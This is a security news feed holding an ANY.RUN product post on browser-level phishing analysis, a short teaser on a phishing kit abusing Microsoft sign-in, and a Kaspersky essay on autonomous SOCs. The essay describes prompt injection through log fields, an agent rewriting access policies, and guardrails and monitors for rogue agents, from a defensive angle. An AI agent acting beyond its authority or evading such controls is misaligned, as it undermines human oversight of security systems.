  • Assess the scale of an attack campaign 
  • Develop resilient detections based on attacker tooling and page artifacts 

Turning Powerful Visibility into Stronger Security Outcomes 

By combining interactive sandboxing, full browser-level visibility, and threat intelligence sourced from over 15,000 security teams, ANY.RUN transforms URL investigations from fragmented, manual analysis into fast, evidence-based decision-making. 

Through eliminating visibility gaps and reducing the need for disconnected tools, security teams can improve outcomes across the entire investigation workflow: 

  • Faster triage and fewer unnecessary escalations: With immediate access to browser-level evidence, Tier 1 analysts can validate suspicious URLs faster and escalate fewer benign cases, improving productivity and reducing pressure on senior teams. 
  • Smoother handoff and incident response: When escalation is required, Tier 2 analysts receive a complete evidence package rather than disconnected indicators, accelerating validation and reducing MTTR. 
  • Stronger detection engineering: Browser telemetry provides a new source of intelligence for building custom detections, hunting hypotheses, and phishing signatures based on real-world attack behavior. 
  • Structured reporting: Built-in SOC-ready reports transform complex investigations into decision-ready intelligence, simplifying triage, escalation, response, and stakeholder communication. 

For enterprises and MSSPs, these operational improvements translate into faster investigations, more efficient use of analyst resources, stronger phishing defenses, and the ability to scale security operations without proportionally increasing workload. 

The new phishing detection standard in your SOC

Eliminate phishing blind spots with full browser visibility



Contact us


Conclusion 

In-browser data inspection closes a critical visibility gap in modern phishing investigations. With it, SOC analysts and threat hunters can investigate phishing attacks directly inside ANY.RUN without manually extracting web content from traffic captures, reconstructing redirect chains, or comparing raw page source against the content rendered in the browser. 

Instead, all browser-level evidence is collected, correlated, and presented within a single investigation environment, helping enterprise security teams investigate threats faster and respond with greater confidence. 

About ANY.RUN 

ANY.RUN helps SOC teams, MSSPs, and enterprises investigate cyber threats faster through interactive malware analysis and threat intelligence. 

Its cloud-based Interactive Sandbox enables security teams to safely analyze suspicious files, URLs, and emails in real time, observe attack behavior as it unfolds, and collect actionable evidence for rapid response. 

ANY.RUN’s Threat Intelligence solutions provide additional context around threats, infrastructure, and attacker activity, helping organizations enrich investigations, streamline security workflows, and improve threat detection. Together, these capabilities enable faster triage, more informed decision-making, and more efficient security operations at scale. 

FAQ 

What is in-browser data inspection? 

In-browser data inspection is a new ANY.RUN capability that collects and displays browser-level activity during URL analysis, including page content, forms, scripts, redirects, screenshots, and DOM modifications. 

How does in-browser data inspection improve phishing analysis? 

It provides visibility into what actually happens inside the browser, helping analysts identify phishing forms, deceptive content, redirect chains, and other browser-based attack techniques that may not be visible through network or file analysis alone. 

What browser data can analysts investigate in ANY.RUN? 

Analysts can examine page content, rendered screenshots, forms, scripts, DOM changes, redirects, URLs, domains, IP addresses, and other browser-level artifacts collected during URL execution. 

How does in-browser data inspection help SOC teams? 

By providing immediate access to browser-level evidence, it reduces manual investigation effort, improves triage accuracy, minimizes unnecessary escalations, and accelerates incident response. 

Can in-browser data inspection be used for threat hunting? 

Yes. Analysts can use collected indicators, page artifacts, and browser telemetry to pivot across related infrastructure, investigate phishing campaigns, and develop threat hunting hypotheses. 

How can browser inspection data improve threat detection? 

Security teams can use content extracted from analyzed web pages to create custom detection rules and hunting signatures, including YARA rules, to identify related threats and phishing campaigns. 

Is in-browser data inspection available in ANY.RUN Interactive Sandbox? 

Yes. In-browser data inspection is available within URL analyses in ANY.RUN’s Interactive Sandbox through the Browser Data tab. 

The post The New Standard for URL Analysis: Closing Phishing Blind Spots with In-Browser Data Inspection  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

EvilTokens: A phishing attack that doesn’t steal your password

A phishing kit subverting Microsoft’s legitimate authentication flow lets attackers break into accounts without stealing passwords or creating fake login pages

WeLiveSecurity – ​Read More

Building an autonomous SOC: core challenges and solutions

The concept of a completely autonomous security operations center (SOC) — where data collection, analysis of suspicious events, investigations, and incident response happen without human intervention — is extremely compelling. This is especially true for organizations grappling with a chronic shortage of cybersecurity talent and a threat landscape that’s growing faster and more sophisticated by the day. Organizations everywhere would welcome an approach where automation helps relieve analyst workloads, shortens alert triage times, and finally eliminates the backlog of unaddressed alerts — which, by some estimates, accounts for 67% of all security events in the average corporate SOC.

While many vendors are already pitching solutions in this space, real-world implementation remains highly problematic. Practitioners report tangible success when using these tools for alert enrichment and filtering out low-priority noise or false positives. However, when it comes to autonomous decision-making and response, very few organizations have managed to achieve a meaningful return on investment.

Foundational roadblocks of an autonomous SOC: looking beyond AI

While leveraging AI for data analysis and decision-making sounds like a logical and relatively easy-to-implement idea, actually putting it into practice exposes and amplifies the exact same challenges organizations faced with SIEM, XDR, and SOAR platforms:

Source data quality. Issues with coverage, enrichment quality, tagging and normalization, which detection engineering teams in every SOC battle daily, become even more acute when AI is introduced. AI agents are more sensitive to data gaps than human analysts, so incomplete data can magnify the resulting errors.

Data consolidation and tool integration. The very problem SIEM was once invented to solve remains a headache for most organizations today. Interestingly, marketing for AI-driven SOCs often claims that “the SIEM is dead” because “agents can just query the EDR directly for telemetry”. In reality, however, even in a best-case scenario, this just means the SIEM disappears as a user interface while its core functions remain embedded within the data fabric of the agentic SOC.

Analysts’ trust. Even when AI is restricted to preliminary data gathering and recommendations, human analysts frequently don’t trust the output, leading them to waste time re-collecting and re-analyzing the same data. Practitioners frequently point to several flaws in current AI SOC implementations: poor handling of gray-area verdicts (when an alert is suspicious but not definitively malicious), lack of safe escalation workflows, and systems that fail to learn when a human analyst corrects their mistakes.

Context deficit. SOCs and security teams in general naturally rely on scantily documented information, such as business context and tribal knowledge, to accurately assess alerts and incidents. It’s very difficult to populate an AI system with that knowledge in a systematic way.

AI-specific issues critical for a SOC

Beyond traditional operational hurdles, fully autonomous SOCs face inherent flaws deeply rooted in the fundamental architecture of language models and AI agents.

Hallucinations and prompt injections. In a SOC environment, a single manipulated log field can easily become a viable exploit vector aimed directly at the agent. In a semi-autonomous setup, an AI hallucination is just a frustrating distraction that erodes analyst trust. In a fully autonomous SOC, however, a hallucination can trigger instantaneous, harmful actions across hundreds or thousands of endpoints simultaneously. A prime example of this risk is the widely cited incident at a Fortune 50 company, where an AI agent went rogue and rewrote access policies on its own.

Need for control. To combat hallucinations and over-automation, organizations typically rely on a human-in-the-loop (HITL) model to approve an agent’s actions. While this improves safety, it completely defeats the primary selling point of agentic AI: response times.

Compliance, audits, and accountability. The inherently stochastic nature of LLM outputs makes logging problematic. They often lack reproducibility and explanations. Consequently, an autonomous SOC will likely struggle to pass regulatory compliance audits. Simply put, current compliance frameworks were never designed to handle the unpredictable behavior of multiple interacting AI agents.

Strategies to overcome the challenges of an autonomous SOC

Specialized frameworks are emerging to address these built-in flaws of AI agents and language models. For the most part, these solutions focus on enforcing formal boundaries around AI privileges, and validating its actions.

Rigorous context engineering. Assuming source data is correct and properly enriched, the number of hallucinations can be minimized, and agent decision quality significantly improved by feeding the language model structured layers of context — such as alerts, user accounts, asset data, and enrichment data.

Narrowing the scope of work. AI agents are less likely to go off the rails when confined to highly repetitive, narrow tasks. For example, an “agent for collecting additional host data” is going to be more effective than an “autonomous threat hunter”.

Neurosymbolic validations and guardrails for agent actions. An Agent-Lock pipeline cleans untrusted log fields, and verifies proposed actions against existing CMDB/IAM policies. This approach enforces key rules, such as making it impossible for the AI to disable telemetry, while managing “autonomy budgets”.

Tiered autonomy over all-or-nothing automation. The Trusted Autonomy framework maps out progressive levels of AI independence based on human-in-the-loop roles and trust thresholds across monitoring, detection, and response. Low-risk operations like data enrichment and alert deduplication run fully automated, while high-blast-radius actions require mandatory human approval.

Governance-first architecture. The LanG platform, which utilizes a hierarchical approach: Governance → MCP → Agentic AI → Security, is one example. It enforces two mandatory human analyst check-ins, fully aligning the workflow with NIST SP 800-61 guidelines. The trade-off, however, is that this framework significantly scales back the solution’s autonomy.

Deterministic execution for high-risk actions. Triage and investigation are handled by a probabilistic AI model, but high-impact actions — like deciding to isolate a host or terminate a session — are based on deterministic code. This approach allows the system to satisfy the strict requirements of SOC 2 and other major regulatory frameworks.

Stateful admission control. For example, the recently proposed ACP protocol monitors behavioral patterns across agent execution logs. This makes it possible to catch rogue agents that are executing a series of individually harmless requests that add up to a coordinated attack.

Key takeaways and pitfalls

We can already confidently state that an autonomous SOC is highly unlikely to bring any improvements for organizations burdened by significant technical and operational debt in areas like data collection and enrichment or standardized incident response workflows. No layer of AI infrastructure will function without that baseline foundation firmly in place.

It’s also clear that, while AI streamlines analyst workflows, it doesn’t completely replace them. This is why Gartner’s prediction that there will never be an autonomous SOC still rings true in 2026. Deploying autonomous agents into the SOC shifts the center of gravity to complex investigations, but most importantly, to complex engineering. Teams will simply trade fine-tuning detection rules for managing AI agent playbooks, data pipelines, and decision-handling workflows.

For mature SOCs, the core hypothesis for the next one to two years is this: an autonomous SOC should be viewed as a direction rather than a destination. AI is already delivering tangible value today — specifically in correlation, enrichment, draft detection rules, and attack reconstruction — provided that each capability has proper security guardrails. These include a well-balanced human-in-the-loop review process for any action that impacts production environments. Security teams investing now in a structured, verifiable approach — one that actively anticipates emerging regulations — will be able to gradually integrate new agentic features into their SOC pipelines. Conversely, organizations that skip this layer will almost certainly run into roadblocks, likely forcing them to rebuild their systems and processes from the ground up.

Kaspersky official blog – ​Read More